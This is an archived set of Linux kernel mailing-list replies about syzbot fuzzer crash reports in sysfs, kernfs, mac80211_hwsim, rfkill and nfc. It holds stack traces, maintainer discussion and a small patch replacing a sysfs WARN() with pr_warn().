Re: WARNING in kernfs_add_one

2018-05-07 Thread Dmitry Vyukov
On Mon, May 7, 2018 at 10:43 AM, Johannes Berg
 wrote:
> On Sat, 2018-05-05 at 15:07 -0700, Greg KH wrote:
>
>> > > > syzbot found the following crash on:
>
> Maybe it should learn to differentiate warnings, if it's going to set
> panic_on_warn :-)

How?
Note that this is not specific to syzbot. If you see WARNINGs in a
subsystem that you have no idea about (or you just a normal user),
what do you do? Right, you report it to maintainers.


> I get why, but still, at least differentiating in the emails wouldn't be
> bad.

Well, the subject says "WARNING".
But note there are _very_ bad WARNINGs too. Generally, a WARNING means
a kernel bug just that kernel can tolerate without bringing the system
down (as opposed to BUG).


>> > > > kernfs: ns required in 'ieee80211' for 'phy3'
>
> Huh. What does that even mean?
>
>> > > > RIP: 0010:kernfs_add_one+0x406/0x4d0 fs/kernfs/dir.c:758
>> > > > RSP: 0018:8801ca9eece0 EFLAGS: 00010286
>> > > > RAX: 002d RBX: 87d5cee0 RCX: 8160ba7d
>> > > > RDX:  RSI: 81610731 RDI: 8801ca9ee840
>> > > > RBP: 8801ca9eed20 R08: 8801d9538500 R09: 0006
>> > > > R10: 8801d9538500 R11:  R12: 8801ad1cb6c0
>> > > > R13: 885da640 R14: 0020 R15: 
>> > > >  kernfs_create_link+0x112/0x180 fs/kernfs/symlink.c:41
>> > > >  sysfs_do_create_link_sd.isra.2+0x90/0x130 fs/sysfs/symlink.c:43
>> > > >  sysfs_do_create_link fs/sysfs/symlink.c:79 [inline]
>> > > >  sysfs_create_link+0x65/0xc0 fs/sysfs/symlink.c:91
>> > > >  device_add_class_symlinks drivers/base/core.c:1612 [inline]
>> > > >  device_add+0x7a0/0x16d0 drivers/base/core.c:1810
>> > > >  wiphy_register+0x178a/0x2430 net/wireless/core.c:806
>> > > >  ieee80211_register_hw+0x13cd/0x35d0 net/mac80211/main.c:1047
>> > > >  mac80211_hwsim_new_radio+0x1d9b/0x3410
>> > > > drivers/net/wireless/mac80211_hwsim.c:2772
>> > > >  hwsim_new_radio_nl+0x7a7/0xa60 
>> > > > drivers/net/wireless/mac80211_hwsim.c:3246
>> > > >  genl_family_rcv_msg+0x889/0x1120 net/netlink/genetlink.c:599
>
> Basically we're creating a new virtual radio, which in turn creates a
> new device, which we have to register.
>
> Something is going on with the context here that makes sysfs unhappy,
> but TBH I have no idea what.
>
> johannes
>
> --
> You received this message because you are subscribed to the Google Groups 
> "syzkaller-bugs" group.
> To unsubscribe from this group and stop receiving emails from it, send an 
> email to syzkaller-bugs+unsubscr...@googlegroups.com.
> To view this discussion on the web visit 
> https://groups.google.com/d/msgid/syzkaller-bugs/1525682589.6049.4.camel%40sipsolutions.net.
> For more options, visit https://groups.google.com/d/optout.


Re: INFO: rcu detected stall in vprintk_default

2018-04-01 Thread Dmitry Vyukov
On Sun, Apr 1, 2018 at 12:50 PM, syzbot
 wrote:
> Hello,
>
> syzbot hit the following crash on upstream commit
> 10b84daddbec72c6b440216a69de9a9605127f7a (Sat Mar 31 17:59:00 2018 +)
> Merge branch 'perf-urgent-for-linus' of
> git://git.kernel.org/pub/scm/linux/kernel/git/tip/tip
> syzbot dashboard link:
> https://syzkaller.appspot.com/bug?extid=19c436b56eaa98e50e98
>
> Unfortunately, I don't have any reproducer for this crash yet.
> Raw console output:
> https://syzkaller.appspot.com/x/log.txt?id=4989667443212288
> Kernel config:
> https://syzkaller.appspot.com/x/.config?id=-2760467897697295172
> compiler: gcc (GCC) 7.1.1 20170620

Seems to be the same as:

#syz dup: INFO: rcu detected stall in vprintk_func

+nfc maintainers


> IMPORTANT: if you fix the bug, please add the following tag to the commit:
> Reported-by: syzbot+19c436b56eaa98e50...@syzkaller.appspotmail.com
> It will help syzbot understand when the bug is fixed. See footer for
> details.
> If you forward the report, please keep this part and the footer.
>
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> INFO: rcu_sched self-detected stall on CPU
> 1-...!: (18264 ticks this GP) idle=37a/1/4611686018427387906
> softirq=28996/28996 fqs=216
>
>  (t=125004 jiffies g=15379 c=15378 q=788)
>
> (detected by 0, t=125004 jiffies, g=15379, c=15378, q=788)
> rcu_sched   R
> CPU: 1 PID: 9892 Comm: syz-executor7 Not tainted 4.16.0-rc7+ #9
> Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS
> Google 01/01/2011
> RIP: 0010:stack_not_used include/linux/sched/task_stack.h:101 [inline]
> RIP: 0010:sched_show_task+0x324/0x5e0 kernel/sched/core.c:5259
> RSP: 0018:8801db107298 EFLAGS: 0046
> RAX: dc00 RBX: 8801d9af8200 RCX: 
> RDX: 11003b3604bd RSI: 11003b620e08 RDI: ed003b620e47
> R10: 885909d0 R11:  R12: 11003b620e55
> R13: 8801d9b025e8 R14: 8801db107388 R15: 8801d9b0
> FS:  7fe826c07700() GS:8801db10() knlGS:
> CS:  0010 DS:  ES:  CR0: 80050033
> DR0:  DR1:  DR2: 
> DR3:  DR6: fffe0ff0 DR7: 0400
> Call Trace:
>  rcu_check_gp_kthread_starvation+0x32d/0x384 kernel/rcu/tree.c:1353
>  update_process_times+0x30/0x60 kernel/time/timer.c:1636
>  tick_sched_handle+0x85/0x160 kernel/time/tick-sched.c:162
>  local_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1025 [inline]
>  smp_apic_timer_interrupt+0x14a/0x700 arch/x86/kernel/apic/apic.c:1050
>  apic_timer_interrupt+0xf/0x20 arch/x86/entry/entry_64.S:857
> RSP: 0018:8801845d74a8 EFLAGS: 0246 ORIG_RAX: ff12
> RAX: 0004 RBX: 110a24ed RCX: 815ae4cf
> RBP: 8801845d7630 R08:  R09: 
> R10:  R11:  R12: 0034
> R13: 8801845d7588 R14: ed00308baeb1 R15: 89db2f40
>  vprintk_default+0x28/0x30 kernel/printk/printk.c:1947
>  printk+0xaa/0xca kernel/printk/printk.c:1980
>  nfc_llcp_send_ui_frame+0x430/0x4e0 net/nfc/llcp_commands.c:758
>  llcp_sock_sendmsg+0x224/0x2f0 net/nfc/llcp_sock.c:790
>  ___sys_sendmsg+0x320/0x8b0 net/socket.c:2046
>  SYSC_sendmmsg net/socket.c:2167 [inline]
>  SyS_sendmmsg+0x35/0x60 net/socket.c:2162
>  do_syscall_64+0x281/0x940 arch/x86/entry/common.c:287
> RIP: 0033:0x454e79
> RSP: 002b:7fe826c06c68 EFLAGS: 0246 ORIG_RAX: 0133
> RDX: 0001 RSI: 2340 RDI: 0014
> RBP: 0072bea0 R08:  R09: 
> R10: 0002 R11: 0246 R12: 
> R13: 04c9 R14: 006f9378 R15: 
> Code: 03 80 3c 02 00 0f 85 6e 02 00 00 4c 8b 7b 40 48 b8 00 00 00 00 00 fc
> ff df 4d 89 fd 49 83 c5 08 4c 89 ea 48 c1 ea 03 80 3c 02 00 <0f> 85 66 02 00
> 00 49 83 7d 00 00 74 e4 4d 29 fd 4c 89 ad f0 fe
> 24368 8  2 0x8000
> Call Trace:
>  context_switch kernel/sched/core.c:2862 [inline]
>  __schedule+0x8fb/0x1ec0 kernel/sched/core.c:3440
> rcu_sched   R  running task
> Call Trace:
>  schedule+0xf5/0x430 kernel/sched/core.c:3499
>  kthread+0x33c/0x400 kernel/kthread.c:238
>  ret_from_fork+0x3a/0x50 arch/x86/entry/entry_64.S:406
> NMI backtrace for cpu 1
>  rcu_gp_kthread+0x9dd/0x18e0 kernel/rcu/tree.c:2230
> Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS
> Google 01/01/2011
> Call Trace:
>  __dump_stack lib/dump_stack.c:17 [inline]
>  dump_stack+0x194/0x24d lib/dump_stack.c:53
>  nmi_trigger_cpumask_backtrace+0x123/0x180 lib/nmi_backtrace.c:62
>  

Re: INFO: rcu detected stall in vprintk_func

2018-04-01 Thread Dmitry Vyukov
On Sun, Apr 1, 2018 at 12:49 PM, syzbot
 wrote:
> Hello,
>
> syzbot hit the following crash on upstream commit
> 3eb2ce825ea1ad89d20f7a3b5780df850e4be274 (Sun Mar 25 22:44:30 2018 +)
> Linux 4.16-rc7
> syzbot dashboard link:
> https://syzkaller.appspot.com/bug?extid=3f28bd18291266ec826b
>
> Unfortunately, I don't have any reproducer for this crash yet.
> Raw console output:
> https://syzkaller.appspot.com/x/log.txt?id=4815791329378304
> Kernel config:
> https://syzkaller.appspot.com/x/.config?id=-2340295454854568752
> compiler: gcc (GCC) 7.1.1 20170620


The problem seems to be in nfc, so +nfc maintainers.


> IMPORTANT: if you fix the bug, please add the following tag to the commit:
> Reported-by: syzbot+3f28bd18291266ec8...@syzkaller.appspotmail.com
> It will help syzbot understand when the bug is fixed. See footer for
> details.
> If you forward the report, please keep this part and the footer.
>
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> INFO: rcu_sched detected stalls on CPUs/tasks:
> (detected by 1, t=125006 jiffies, g=23111, c=23110, q=45)
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> syz-executor1   R  running task24512 13655   4242 0x0008
> Call Trace:
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  print_other_cpu_stall+0x996/0x1090 kernel/rcu/tree.c:1480
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  check_cpu_stall.isra.61+0x6e6/0x15b0 kernel/rcu/tree.c:1598
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  update_process_times+0x30/0x60 kernel/time/timer.c:1636
>  tick_sched_timer+0x42/0x120 kernel/time/tick-sched.c:1194
>  __run_hrtimer kernel/time/hrtimer.c:1349 [inline]
>  __hrtimer_run_queues+0x39c/0xec0 kernel/time/hrtimer.c:1411
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  hrtimer_interrupt+0x2a5/0x6f0 kernel/time/hrtimer.c:1469
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  apic_timer_interrupt+0xf/0x20 arch/x86/entry/entry_64.S:857
> RIP: 0010:arch_local_irq_restore arch/x86/include/asm/paravirt.h:778
> [inline]
> RIP: 0010:console_unlock+0xd98/0xfb0 kernel/printk/printk.c:2399
> RAX: 0001 RBX: 0200 RCX: 815a8fef
> RDX: 0001 RSI: c90004937000 RDI: 0246
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> R10:  R11:  R12: dc00
> R13:  R14: 83ba1660 R15: dc00
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  vprintk_func+0x57/0xc0 kernel/printk/printk_safe.c:379
>  printk+0xaa/0xca kernel/printk/printk.c:1980
>  nfc_llcp_send_ui_frame+0x430/0x4e0 net/nfc/llcp_commands.c:758
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  __sys_sendmmsg+0x1ee/0x620 net/socket.c:2136
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  SYSC_sendmmsg net/socket.c:2167 [inline]
>  SyS_sendmmsg+0x35/0x60 net/socket.c:2162
>  do_syscall_64+0x281/0x940 arch/x86/entry/common.c:287
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
>  entry_SYSCALL_64_after_hwframe+0x42/0xb7
> RSP: 002b:7fdb811c4c68 EFLAGS: 0246 ORIG_RAX: 0133
> RAX: ffda RBX: 7fdb811c56d4 RCX: 00454879
> RBP: 0072bea0 R08:  R09: 
> R10:  R11: 0246 R12: 
> R13: 04c0 R14: 006f82a0 R15: 
> rcu_sched kthread starved for 125907 jiffies! g23111 c23110 f0x2
> RCU_GP_WAIT_FQS(3) ->state=0x0 ->cpu=1
> llcp: nfc_llcp_send_ui_frame: Could not allocate PDU
> rcu_sched   R  running task23448 8  2 0x8000
>  context_switch kernel/sched/core.c:2862 [inline]
>  

Re: WARNING in check_flush_dependency

2018-02-19 Thread Dmitry Vyukov
On Wed, Jan 24, 2018 at 8:39 AM, Johannes Berg
 wrote:
> On Mon, 2018-01-22 at 23:39 -0800, syzbot wrote:
>> Hello,
>>
>> syzbot hit the following crash on upstream commit
>> 0d665e7b109d512b7cae3ccef6e8654714887844 (Fri Jan 19 12:49:24 2018 +)
>> mm, page_vma_mapped: Drop faulty pointer arithmetics in check_pte()
>>
>> So far this crash happened 23 times on net-next, upstream.
>> C reproducer is attached.
>> syzkaller reproducer is attached.
>> Raw console output is attached.
>> compiler: gcc (GCC) 7.1.1 20170620
>> .config is attached.
>> user-space arch: i386
>>
>> IMPORTANT: if you fix the bug, please add the following tag to the commit:
>> Reported-by: syzbot+41cdaf4232c50e658...@syzkaller.appspotmail.com
>> It will help syzbot understand when the bug is fixed. See footer for
>> details.
>> If you forward the report, please keep this part and the footer.
>>
>> [ cut here ]
>> workqueue: WQ_MEM_RECLAIM hwsim_wq:destroy_radio is
>> flushing !WQ_MEM_RECLAIM events_highpri:flush_backlog
>> WARNING: CPU: 0 PID: 3706 at kernel/workqueue.c:2439
>> check_flush_dependency+0x239/0x380 kernel/workqueue.c:2435
>> Kernel panic - not syncing: panic_on_warn set ...
>
> Yeah, we clearly shouldn't have WQ_RECLAIM set on this workqueue...

Hi Johannes,

Do you mind to send a patch to fix this?


Re: WARNING in sysfs_warn_dup

2018-01-22 Thread Dmitry Vyukov
On Mon, Jan 22, 2018 at 3:45 PM, Greg KH <gre...@linuxfoundation.org> wrote:
> On Mon, Jan 22, 2018 at 03:30:12PM +0100, Dmitry Vyukov wrote:
>> On Mon, Jan 22, 2018 at 3:00 PM, Greg KH <gre...@linuxfoundation.org> wrote:
>> > On Mon, Jan 22, 2018 at 02:47:33PM +0100, Dmitry Vyukov wrote:
>> >> On Tue, Dec 19, 2017 at 10:06 AM, Dmitry Vyukov <dvyu...@google.com> 
>> >> wrote:
>> >> > On Tue, Dec 19, 2017 at 10:03 AM, Dmitry Vyukov <dvyu...@google.com> 
>> >> > wrote:
>> >> >>
>> >> >> On Tue, Dec 19, 2017 at 10:01 AM, Greg KH <gre...@linuxfoundation.org> 
>> >> >> wrote:
>> >> >>>
>> >> >>> On Mon, Dec 18, 2017 at 08:57:01AM -0800, syzbot wrote:
>> >> >>> > Hello,
>> >> >>> >
>> >> >>> > syzkaller hit the following crash on
>> >> >>> > 6084b576dca2e898f5c101baef151f7bfdbb606d
>> >> >>> > git://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/master
>> >> >>> > compiler: gcc (GCC) 7.1.1 20170620
>> >> >>> > .config is attached
>> >> >>> > Raw console output is attached.
>> >> >>> >
>> >> >>> > Unfortunately, I don't have any reproducer for this bug yet.
>> >> >>> >
>> >> >>> >
>> >> >>> > netlink: 9 bytes leftover after parsing attributes in process
>> >> >>> > `syz-executor3'.
>> >> >>> > sg_write: data in/out 822404280/197 bytes for SCSI command 0x12-- 
>> >> >>> > guessing
>> >> >>> > data in;
>> >> >>> >program syz-executor0 not setting count and/or reply_len properly
>> >> >>> > sg_write: data in/out 262364/161 bytes for SCSI command 0xff-- 
>> >> >>> > guessing data
>> >> >>> > in;
>> >> >>> >program syz-executor0 not setting count and/or reply_len properly
>> >> >>> > WARNING: CPU: 1 PID: 22282 at fs/sysfs/dir.c:31 
>> >> >>> > sysfs_warn_dup+0x60/0x80
>> >> >>> > fs/sysfs/dir.c:30
>> >> >>> > Kernel panic - not syncing: panic_on_warn set ...
>> >> >>>
>> >> >>> Looks like a networking issue, it tried to create two sysfs 
>> >> >>> directories
>> >> >>> with the same name, which isn't a sysfs bug :)
>> >> >
>> >> >
>> >> > Now as plain text:
>> >> >
>> >> > +net/core/dev.c maintainers
>> >>
>> >>
>> >> Also happens for wiphy_register (on upstream
>> >> a8750ddca918032d6349adbf9a4b6555e7db20da):
>> >>
>> >> [ cut here ]
>> >> sysfs: cannot create duplicate filename
>> >> '/class/ieee80211/š§"­ût{§Ô­ðô Š!× ž 7… Š†õiùS6 È< »þ {_CK5äá   ×ÝÊmô Be'
>> >
>> > That's a wonderful filename :)
>> >
>> >> WARNING: CPU: 1 PID: 8233 at fs/sysfs/dir.c:31
>> >> sysfs_warn_dup+0x7e/0xa0 fs/sysfs/dir.c:30
>> >
>> > As this is just sysfs saying "Hey dummy, you are trying to do something
>> > foolish here", what would be the better thing for it to do?
>> >
>> > Just printk(KERN_WARNING...) and then dump the stack?
>> >
>> > It seems the WARN_ON() that is currently being used is being treated as
>> > an "error" by your testing, when really it isn't, unless the caller can
>> > not handle the error being passed back up to it by the sysfs core.
>> > Which it should, but I don't think you are even giving it the chance as
>> > you are:
>> >
>> >> Kernel panic - not syncing: panic_on_warn set ...
>> >
>> > Yup, panic_on_warn :(
>> >
>> > ideas to make this easier for you?
>>
>>
>> pr_warn or pr_warn_once (optionally followed by dump_stack) would work
>> for syzbot.
>
> This shouldn't be a _once() call, as it is called by things all over the
> kernel, all with unique paths.
>
> I'll go make up a patch for this, thanks.

#syz fix: sysfs: turn WARN() into pr_warn()


Re: [PATCH] sysfs: turn WARN() into pr_warn()

2018-01-22 Thread Dmitry Vyukov
On Mon, Jan 22, 2018 at 3:57 PM, Greg KH <gre...@linuxfoundation.org> wrote:
> From: Greg Kroah-Hartman <gre...@linuxfoundation.org>
>
> It's not good to crash the machine if panic_on_warn() is set just
> because someone made a stupid mistake of trying to create a sysfs file
> with the same name of an existing one.  This makes the automated testing
> tools a lot harder to find the real bugs in the kernel.
>
> So just print a warning out and dump the stack to get the attention of
> the developer that they did something foolish.  Then keep on trucking,
> as this should not be a fatal error at all.
>
> Reported-by: Dmitry Vyukov <dvyu...@google.com>
> Signed-off-by: Greg Kroah-Hartman <gre...@linuxfoundation.org>
> ---
>
> Dmitry, does this look good to you?  If so, I'll queue it up for
> 4.16-rc1.

Perfect! Looks good. syzbot reacts on "WARNING:" string (+ if kernel
panic due to panic_on_warn that's also obviously a problem).

> diff --git a/fs/sysfs/dir.c b/fs/sysfs/dir.c
> index 2b67bda2021b..3a36a48a4b3f 100644
> --- a/fs/sysfs/dir.c
> +++ b/fs/sysfs/dir.c
> @@ -10,6 +10,7 @@
>   * Please see Documentation/filesystems/sysfs.txt for more information.
>   */
>
> +#define pr_fmt(fmt)"sysfs: " fmt
>  #undef DEBUG
>
>  #include 
> @@ -27,8 +28,8 @@ void sysfs_warn_dup(struct kernfs_node *parent, const char 
> *name)
> if (buf)
> kernfs_path(parent, buf, PATH_MAX);
>
> -   WARN(1, KERN_WARNING "sysfs: cannot create duplicate filename 
> '%s/%s'\n",
> -buf, name);
> +   pr_warn("cannot create duplicate filename '%s/%s'\n", buf, name);
> +   dump_stack();
>
> kfree(buf);
>  }


Re: WARNING in sysfs_warn_dup

2018-01-22 Thread Dmitry Vyukov
On Mon, Jan 22, 2018 at 3:00 PM, Greg KH <gre...@linuxfoundation.org> wrote:
> On Mon, Jan 22, 2018 at 02:47:33PM +0100, Dmitry Vyukov wrote:
>> On Tue, Dec 19, 2017 at 10:06 AM, Dmitry Vyukov <dvyu...@google.com> wrote:
>> > On Tue, Dec 19, 2017 at 10:03 AM, Dmitry Vyukov <dvyu...@google.com> wrote:
>> >>
>> >> On Tue, Dec 19, 2017 at 10:01 AM, Greg KH <gre...@linuxfoundation.org> 
>> >> wrote:
>> >>>
>> >>> On Mon, Dec 18, 2017 at 08:57:01AM -0800, syzbot wrote:
>> >>> > Hello,
>> >>> >
>> >>> > syzkaller hit the following crash on
>> >>> > 6084b576dca2e898f5c101baef151f7bfdbb606d
>> >>> > git://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/master
>> >>> > compiler: gcc (GCC) 7.1.1 20170620
>> >>> > .config is attached
>> >>> > Raw console output is attached.
>> >>> >
>> >>> > Unfortunately, I don't have any reproducer for this bug yet.
>> >>> >
>> >>> >
>> >>> > netlink: 9 bytes leftover after parsing attributes in process
>> >>> > `syz-executor3'.
>> >>> > sg_write: data in/out 822404280/197 bytes for SCSI command 0x12-- 
>> >>> > guessing
>> >>> > data in;
>> >>> >program syz-executor0 not setting count and/or reply_len properly
>> >>> > sg_write: data in/out 262364/161 bytes for SCSI command 0xff-- 
>> >>> > guessing data
>> >>> > in;
>> >>> >program syz-executor0 not setting count and/or reply_len properly
>> >>> > WARNING: CPU: 1 PID: 22282 at fs/sysfs/dir.c:31 
>> >>> > sysfs_warn_dup+0x60/0x80
>> >>> > fs/sysfs/dir.c:30
>> >>> > Kernel panic - not syncing: panic_on_warn set ...
>> >>>
>> >>> Looks like a networking issue, it tried to create two sysfs directories
>> >>> with the same name, which isn't a sysfs bug :)
>> >
>> >
>> > Now as plain text:
>> >
>> > +net/core/dev.c maintainers
>>
>>
>> Also happens for wiphy_register (on upstream
>> a8750ddca918032d6349adbf9a4b6555e7db20da):
>>
>> [ cut here ]
>> sysfs: cannot create duplicate filename
>> '/class/ieee80211/š§"­ût{§Ô­ðô Š!× ž 7… Š†õiùS6 È< »þ {_CK5äá   ×ÝÊmô Be'
>
> That's a wonderful filename :)
>
>> WARNING: CPU: 1 PID: 8233 at fs/sysfs/dir.c:31
>> sysfs_warn_dup+0x7e/0xa0 fs/sysfs/dir.c:30
>
> As this is just sysfs saying "Hey dummy, you are trying to do something
> foolish here", what would be the better thing for it to do?
>
> Just printk(KERN_WARNING...) and then dump the stack?
>
> It seems the WARN_ON() that is currently being used is being treated as
> an "error" by your testing, when really it isn't, unless the caller can
> not handle the error being passed back up to it by the sysfs core.
> Which it should, but I don't think you are even giving it the chance as
> you are:
>
>> Kernel panic - not syncing: panic_on_warn set ...
>
> Yup, panic_on_warn :(
>
> ideas to make this easier for you?


pr_warn or pr_warn_once (optionally followed by dump_stack) would work
for syzbot.

Thanks!


Re: WARNING in sysfs_warn_dup

2018-01-22 Thread Dmitry Vyukov
On Tue, Dec 19, 2017 at 10:06 AM, Dmitry Vyukov <dvyu...@google.com> wrote:
> On Tue, Dec 19, 2017 at 10:03 AM, Dmitry Vyukov <dvyu...@google.com> wrote:
>>
>> On Tue, Dec 19, 2017 at 10:01 AM, Greg KH <gre...@linuxfoundation.org> wrote:
>>>
>>> On Mon, Dec 18, 2017 at 08:57:01AM -0800, syzbot wrote:
>>> > Hello,
>>> >
>>> > syzkaller hit the following crash on
>>> > 6084b576dca2e898f5c101baef151f7bfdbb606d
>>> > git://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/master
>>> > compiler: gcc (GCC) 7.1.1 20170620
>>> > .config is attached
>>> > Raw console output is attached.
>>> >
>>> > Unfortunately, I don't have any reproducer for this bug yet.
>>> >
>>> >
>>> > netlink: 9 bytes leftover after parsing attributes in process
>>> > `syz-executor3'.
>>> > sg_write: data in/out 822404280/197 bytes for SCSI command 0x12-- guessing
>>> > data in;
>>> >program syz-executor0 not setting count and/or reply_len properly
>>> > sg_write: data in/out 262364/161 bytes for SCSI command 0xff-- guessing 
>>> > data
>>> > in;
>>> >program syz-executor0 not setting count and/or reply_len properly
>>> > WARNING: CPU: 1 PID: 22282 at fs/sysfs/dir.c:31 sysfs_warn_dup+0x60/0x80
>>> > fs/sysfs/dir.c:30
>>> > Kernel panic - not syncing: panic_on_warn set ...
>>>
>>> Looks like a networking issue, it tried to create two sysfs directories
>>> with the same name, which isn't a sysfs bug :)
>
>
> Now as plain text:
>
> +net/core/dev.c maintainers


Also happens for wiphy_register (on upstream
a8750ddca918032d6349adbf9a4b6555e7db20da):

[ cut here ]
sysfs: cannot create duplicate filename
'/class/ieee80211/š§"­ût{§Ô­ðô Š!× ž 7… Š†õiùS6 È< »þ {_CK5äá   ×ÝÊmô Be'
WARNING: CPU: 1 PID: 8233 at fs/sysfs/dir.c:31
sysfs_warn_dup+0x7e/0xa0 fs/sysfs/dir.c:30
Kernel panic - not syncing: panic_on_warn set ...

CPU: 1 PID: 8233 Comm: syz-executor7 Not tainted 4.15.0-rc8+ #263
Hardware name: Google Google Compute Engine/Google Compute Engine,
BIOS Google 01/01/2011
Call Trace:
 __dump_stack lib/dump_stack.c:17 [inline]
 dump_stack+0x194/0x257 lib/dump_stack.c:53
 panic+0x1e4/0x41c kernel/panic.c:183
 __warn+0x1dc/0x200 kernel/panic.c:547
 report_bug+0x211/0x2d0 lib/bug.c:184
 fixup_bug.part.11+0x37/0x80 arch/x86/kernel/traps.c:178
 fixup_bug arch/x86/kernel/traps.c:247 [inline]
 do_error_trap+0x2d7/0x3e0 arch/x86/kernel/traps.c:296
 do_invalid_op+0x1b/0x20 arch/x86/kernel/traps.c:315
 invalid_op+0x22/0x40 arch/x86/entry/entry_64.S:1085
RIP: 0010:sysfs_warn_dup+0x7e/0xa0 fs/sysfs/dir.c:30
RSP: 0018:8801d00def20 EFLAGS: 00010286
RAX: dc08 RBX: 8801c4ff2ac0 RCX: 8159dade
RDX: cb4f RSI: c9000192b000 RDI: 8801d00dec28
RBP: 8801d00def38 R08: 11003a01bd61 R09: 
R10:  R11:  R12: 8801d976fa80
R13: 8801d833e380 R14: 0001 R15: ffef
 sysfs_do_create_link_sd.isra.2+0xf3/0x110 fs/sysfs/symlink.c:51
 sysfs_do_create_link fs/sysfs/symlink.c:80 [inline]
 sysfs_create_link+0x65/0xc0 fs/sysfs/symlink.c:92
 device_add_class_symlinks drivers/base/core.c:1603 [inline]
 device_add+0x74a/0x1650 drivers/base/core.c:1801
 wiphy_register+0x1468/0x2050 net/wireless/core.c:800
 ieee80211_register_hw+0x1162/0x3100 net/mac80211/main.c:1038
 mac80211_hwsim_new_radio+0x1b2e/0x2b90
drivers/net/wireless/mac80211_hwsim.c:2700
 hwsim_new_radio_nl+0x5b7/0x7c0 drivers/net/wireless/mac80211_hwsim.c:3152
 genl_family_rcv_msg+0x7b7/0xfb0 net/netlink/genetlink.c:599
 genl_rcv_msg+0xb2/0x140 net/netlink/genetlink.c:624
 netlink_rcv_skb+0x224/0x470 net/netlink/af_netlink.c:2408
 genl_rcv+0x28/0x40 net/netlink/genetlink.c:635
 netlink_unicast_kernel net/netlink/af_netlink.c:1275 [inline]
 netlink_unicast+0x4ee/0x700 net/netlink/af_netlink.c:1301
 netlink_sendmsg+0xa4a/0xe60 net/netlink/af_netlink.c:1864
 sock_sendmsg_nosec net/socket.c:638 [inline]
 sock_sendmsg+0xca/0x110 net/socket.c:648
 ___sys_sendmsg+0x767/0x8b0 net/socket.c:2028
 __sys_sendmsg+0xe5/0x210 net/socket.c:2062
 SYSC_sendmsg net/socket.c:2073 [inline]
 SyS_sendmsg+0x2d/0x50 net/socket.c:2069
 entry_SYSCALL_64_fastpath+0x29/0xa0



If you fix this, please add:
Reported-by: 
syzbot+1fdad4e2731bf0c1bc19953ccc5061237ec92...@syzkaller.appspotmail.com
tag. It will help syzbot understand when the bug is fixed.


Re: WARNING in rfkill_alloc

2018-01-15 Thread Dmitry Vyukov
On Mon, Jan 15, 2018 at 1:01 PM, Johannes Berg
<johan...@sipsolutions.net> wrote:
> On Mon, 2018-01-15 at 10:12 +0100, Dmitry Vyukov wrote:
>
>> However, there can be some surprising things, for example, executing
>> one ioctl/setsockopt with data meant for another one, or these
>> 0x are actually mean 0 (for involved reasons),
>
> I think those fff was actually what was throwing me off.
>
>> or we
>> can simply have bugs in these descriptions so they don't match C
>> structures and then all data is messed/shifted.
>
> No, I think this part was OK.
>
>> If this representation does not make sense to you right away, your
>> best bet is looking at/running the C reproducer where you can see true
>> data layout:
>>
>>
> [...]
> Yeah, good point, I should've just done that.
>
>> > Ah, then again, now I see the fault injection - I guess dev_set_name()
>> > just failed and we didn't check the return value, will fix that.
>>
>> Yes, it's highly likely the root cause. The raw.log file shows there
>> there was an immediately preceding fault in kmalloc in the same
>> process, in a close stack.
>
> Yep, I submitted the fix now (with the correct reported-by).
>
> Also for the other one, the wiphy_register() warning.

Thanks!


Re: WARNING in rfkill_alloc

2018-01-15 Thread Dmitry Vyukov
On Mon, Jan 15, 2018 at 9:57 AM, Johannes Berg
 wrote:
> Hi,
>
>> RIP: 0010:rfkill_alloc+0x2c0/0x380 net/rfkill/core.c:930
>
> This seems pretty obvious - there's no name given.
>
>>   wiphy_new_nm+0x159c/0x21d0 net/wireless/core.c:487
>>   ieee80211_alloc_hw_nm+0x4b4/0x2140 net/mac80211/main.c:531
>
> which is strange, because we try to validate the name here.
>
> Can you help me read this?
>
> sendmsg$nl_generic(r1, &(0x7fb3e000-0x38)={&(0x7fd4a000-
> 0xc)={0x10, 0x0, 0x0, 0x0}, 0xc,
